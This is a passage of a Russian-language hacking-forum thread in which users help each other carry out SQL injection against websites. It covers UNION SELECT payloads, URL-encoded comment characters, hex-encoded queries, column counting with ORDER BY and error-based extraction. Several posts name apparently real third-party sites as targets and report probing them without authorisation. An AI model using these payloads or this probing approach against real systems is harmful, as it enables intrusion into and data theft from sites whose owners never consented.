Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Всё примерно так же как и в обычной:
    Стандартно ищешь нужные таблицы лимитом,потом колонки итд.
     
    1 person likes this.
  2. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    проблема такая....
    есть уязвимое место в параметре такого вот вида "123,345,678", который парсится в результате получается примерно такой sql
    ...name FROM users WHERE id != 1 AND (id='123' OR id='345' OR id='678') ...
    хочу вставить юнион "123') union select 11,22,33 from users where (id='345" в запрос, но не знаю как написать sql без использования запятых, а иначе запрос дробится
    И вторая проблема в том что не получается использовать символ # что бы закоментировать оставшуюся часть sql.
    подскажите как сделать
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    AND (id='1237176' or id='12323781') union select 1,2,3,4,... etc.
    # - %23 :)
     
  4. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    так не получится. Я же писал, что параметр разбивается на части по запятым.

    и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
    то получится такая фигня :
    name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
    т.к. присутствуют запятые

    и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
     
  5. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    проскань порты
    mysql 3306

    можешь попробовать
    http://site.com:3306/
     
    1 person likes this.
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ааа вот оно что, попробуй значит.
    1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c362c372c38 .... %23
     
    1 person likes this.
  7. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    Это вроде помогает, хотя еще не понятно. но теперь хотя бы на количество столбцов ругается, а не на синтаксис. Возможно просто считает это одним столбцом.

    Объясни пожалуйста что это за строка такая, и как её самому собирать.

    А база похоже PostgreSQL....
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://ctacok.ru/he.php?c=union%20select%201,2,3,4,5,6,7,8
    http://ctacok.ru/he.php?c=order%20by%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
    Вбиваешь:
    0x6f7264657220627920312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c333
    Какая ошибка вылезет, отнимаешь один, и вот тебе кол-во столбцов.
    Ex:
    если ошибка с числом 25, то колонок 24 :)
    Ну ты понел чо дальше делать
     
  9. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    вобщем так тоже не прокатывает. База воспринимает эту строку значение одного столбца. Может быть конечно я что то не то делаю...
    Столбцов там 3, вычислил с помощью order by. (order by 3 - так работает, а так order by 4 уже нет )

    Как же мне запятые спрятать?
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196
    только скобки попробуй заюзать. Не могу найти статью об этом.

    Но там что-то типа script.php?id=N(union)(select)(1)(2)

    Если не прав поправьте



    вот
    https://forum.antichat.ru/threadnav125796-2-10.html


    конкретно, https://forum.antichat.ru/showpost.php?p=1734851&postcount=13
     
    #12870 попугай, 12 May 2010
    Last edited: 12 May 2010
    1 person likes this.
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Да да так идёт.
    Кстате ехал в автобусе вспомнил про вывод через ошибку.
    Пробуй через вывод ошибок. Правдо каждый раз хексить ... :)
     
  12. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Выручайте. крутил вертел - этот кубик рубик не собрал
    http:// dragonar. biz/ news.php?pg=1
    Может кто разрулит php или sql - отпишитесь по результатам.
     
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://dragonar.biz/news.php?pg=-123
    Страница(-123):1
    http://dragonar.biz/news.php?pg=-23abcd
    Страница(-23):1

    => intval ()

    Да
     
    #12873 Ctacok, 12 May 2010
    Last edited: 12 May 2010
  14. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Я так понял ничего не выйдет. :mad:
     
  15. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    нет со скобками не получилось.
    Я так понял union без запятых не сделать. Эта задачка мне не под силу. (((( Спасибо за содействие, но я сдаюсь

    А что за метод через вывод ошибок? Бегло поискал описание, но не нашел.
     
  16. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.ru/showpost.php?p=1796647&postcount=20
     
  17. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    http://warcastle.ru/database_miss.php?id=-25
    кстати вот еще сайтец. 23 поля раньше было. все канало.
    а теперь толи прикрыли дыру толи чё, понять немогу.
     
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ну сам то думай, если ты раньше это смог сделать, сейчас нет?
    Естественно залатали, или ппробуй потыкай +-10 столбцов.
     
  19. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    похоже прикрыли, никак не удается влиять на запрос
     
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    там нет скули, походу. Просто ошибка в скрипте, наверное база пустая.
     
Loading...
Thread Status:
Not open for further replies.